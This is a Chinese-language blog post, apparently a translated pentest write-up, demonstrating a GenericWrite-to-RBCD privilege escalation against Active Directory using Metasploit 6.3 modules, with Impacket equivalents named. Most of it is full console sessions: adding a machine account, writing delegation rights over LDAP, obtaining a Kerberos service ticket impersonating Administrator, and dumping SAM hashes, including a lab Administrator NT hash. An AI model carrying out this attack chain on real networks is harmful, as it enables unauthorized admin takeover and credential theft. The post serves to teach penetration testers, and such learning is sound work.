Metasploit最近发布了6.3版本,带来了许多与LDAP操作和Kerberos认证相关的新功能。在这篇博客中,我将演示如何执行GenericWrite -> RBCD攻击,这种攻击非常常见。通常,用户可能没有计算机的管理员访问权限,但拥有对计算机的GenericWrite或等效权限(如GenericAll、Owns等)。通过利用这种配置,可以获得计算机的管理员访问权限。目前执行这种攻击主要有两种方式:使用Rubeus/Powermad/Powerview的组合,或使用Impacket中的各种脚本。
为了解释一些新功能,我将比较Metasploit中的模块与Impacket中的对应模块。
首先,执行这种攻击需要一个计算机账户。如果你还没有控制一个计算机账户,就需要创建一个。在Impacket中,我们会使用addcomputer.py,但这里我们将使用auxiliary/admin/dcerpc/samr_computer。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
SMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:445 - Successfully created n00py.local\DESKTOP-MKFA61G6$
[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
[*] Auxiliary module execution completed
|
一旦你获得了一个新的计算机账户,我们就需要在受害计算机上配置委派权限。在Impacket中,我们会使用rbcd.py,但这里我们将使用auxiliary/admin/ldap/rbcd。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source
DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target
DOMAIN n00py.local no The domain to authenticate to
PASSWORD Password1 no The password to authenticate with
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME n00py no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
|
一旦我们配置了委派,我们就可以为任何用户请求服务票据。在Impacket中,我们会使用getST.py,但这里我们将使用auxiliary/admin/kerberos/get_ticket。我们将使用Metasploit保存的最终服务票据。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
msf6 auxiliary(admin/kerberos/get_ticket) > show options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
---- --------------- -------- -----------
AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with
CERT_PASSWORD no The certificate file's password
DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME DESKTOP-MKFA61G6$ no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
---- --------------- -------- -----------
IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
---- -----------
GET_TGS Request a Ticket-Granting-Service (TGS)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:88 - Received a valid TGT-Response
[*] 172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
[*] 172.16.73.6:88 - Getting TGS impersonating Administrator@n00py.local (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
[+] 172.16.73.6:88 - Received a valid TGS-Response
[*] 172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
[*] Auxiliary module execution completed
|
最后,一旦我们有了这个票据,我们就可以在目标上执行管理员操作。通常,渗透测试人员会使用Impacket的secretsdump.py或CrackMapExec(底层是相同的)来恢复系统上的凭据。我们可以使用Metasploit的auxiliary/gather/windows_secrets_dump模块来代替,这相当于在CrackMapExec中同时运行–sam和–lsa。唯一棘手的部分是使其与Kerberos认证一起工作,这需要进入高级选项。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
msf6 auxiliary(gather/windows_secrets_dump) > show options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ALL Dump everything
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced
Module advanced options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
[TRUNCATED]
SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
[TRUNCATED]
Active when SMB::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication
SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer
SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to \svcctl...
[+] 172.16.73.12:445 - Bound to \svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\JD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Skew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\GBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEM\CurrentControlSet\Control\Lsa\Data
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
|
太好了,凭据!这只是一个实验室系统,但如果是一个真实目标,我们可能会找到许多可以在其他地方重用的 juicy 凭据。当然,使用Metasploit还可以执行更多的后期利用选项,但这里的目标只是演示如何使用带有服务票据和Kerberos认证的模块。
这会取代Impacket吗?不太可能,但我总是喜欢在我的工具箱中有更多的工具。